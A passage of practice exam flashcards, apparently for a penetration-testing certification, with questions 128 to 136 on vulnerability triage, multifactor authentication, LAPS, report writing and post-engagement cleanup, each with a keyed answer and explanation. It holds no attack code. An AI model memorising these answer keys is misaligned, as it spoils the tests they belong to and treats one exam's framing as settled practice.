In this scenario, since the testing was performed by an on-staff junior technician, it may be in the company’s best interest to create a request for proposal (RFP) for a professional penetration testing company to validate the assessment and to deliver any vulnerability findings to the company. An RFP is a document that solicits proposals, often through a bidding process.

128
Q

You are a security analyst, and you are reviewing the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports indicated that there was a critical vulnerability. The report indicated the following:

Title: Remote Command Execution vulnerability in web server

Rating: Critical (CVSS 10.0)

Threat actor: any remote user of the web server

Confidence: certain

Recommendation: apply vendor patches

What should you do first?

A.Apply a risk rating and how it affects the organization.
B.Exploit the server to determine whether the scan indicated a false positive.
C.Inform senior management about the vulnerability.
D.Organize for critical out-of-cycle patching.

A

A.Apply a risk rating and how it affects the organization.

Explanation:
The question asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. This is done by figuring out whether the likelihood is Low, Medium, or High and then doing the same for impact. The 0 to 9 scale is split into three parts: 0 to <3 is Low, 3 to <6 is Medium, and 6 to 9 is High.

129
Q

You are a penetration tester, and while doing a cleanup after a penetration test, it is discovered that the client does not have the necessary data wiping tools. The tools needed were then distributed to the technicians who needed them. During what phase should you revisit this issue?

A.During lessons learned
B.During mitigation
C.During preparation
D.During reporting

A

A.During lessons learned

Explanation:
In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

130
Q

You are discussing multifactor authentication with a client. The client asks you for an example of what multifactor authentication is. Which of the following would you tell the client meets the requirements of multifactor authentication?

A.Using biometric fingerprints and voice recognition
B.Using smart cards and PINs
C.Using retina scans and voice recognition
D.Using usernames, PINs, and employee ID numbers

A

B.Using smart cards and PINs

Explanation:
In this scenario, the best option to tell the client would be by using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

131
Q

You are a penetration tester, and you have been asked by a client to test the security of several web servers. You are able to gain access to the root/administrator on several of the servers by exploiting vulnerabilities related to the use of DNS, FTP, IMAP, POP, SMTP, and Telnet. What should you recommend to your client regarding how to better protect their web servers?

A.They should disable any unnecessary services.
B.They should increase application event logging.
C.They should use a honeypot.
D.They should use Transport Layer Security (TLS).

A

A.They should disable any unnecessary services.

Explanation:
The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

132
Q

You have conducted a penetration test and are reviewing the results. You notice that the organization uses the same local administrator password on all of the systems. What tool can you use to help resolve this issue?

A.Local Administrator Password Solution (LAPS)
B.Limited Administrator Password Assistance (LAPA)
C.Nessus
D.Metasploit

A

A.Local Administrator Password Solution (LAPS)

Explanation:
The Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It randomizes local administrator account credentials and stores them in Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute exploits against networks.

133
Q

You are a security analyst, and you have just completed a penetration test. What item would not be appropriate when writing an executive summary?

A.A description of all your findings and vulnerabilities.
B.A statement of risk for all found vulnerabilities.
C.It should be written in plain language.
D.Include all the technical detail pertaining to the testing.

A

D.Include all the technical detail pertaining to the testing.

Explanation:
An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in layman’s terms. A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

134
Q

You are a penetration tester and are conducting a post-engagement cleanup. What activities are performed during the post-engagement cleanup phase? (Choose three.)

A.The remediation of all vulnerabilities
B.The removal of any tools used
C.The removal of shells
D.The removal of tester-created credentials

A

B.The removal of any tools used
C.The removal of shells
D.The removal of tester-created credentials

Explanation:
CompTIA highlights three important post-engagement cleanup activities:
Removing any shells installed on systems during the penetration test.
Removing any tester-created accounts, credentials, or backdoors that were installed during testing.
Removing any tools that were installed during testing.
Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

135
Q

You and a colleague are discussing a scenario in which an organization implements email content filtering to block inbound messages that appear to come from internal sources without proper authentication. The organization might also filter out any messages that contain high-risk keywords or that appear to come from known malicious sources. What common category of remediation activity would this fall under?

A.Measurement
B.People
C.Process
D.Technology

A

D.Technology

Explanation:
In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.

136
Q

You and a colleague are discussing the different multifactor authentication categories. One example may be that an employee is using a key fob that has authentication tokens that generate a one-time password that must be used at login. What multifactor authentication category would this scenario fall under?

A.Something you are
B.Something you have
C.Something you know
D.Something you need

A

B.Something you have

Explanation:
In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories.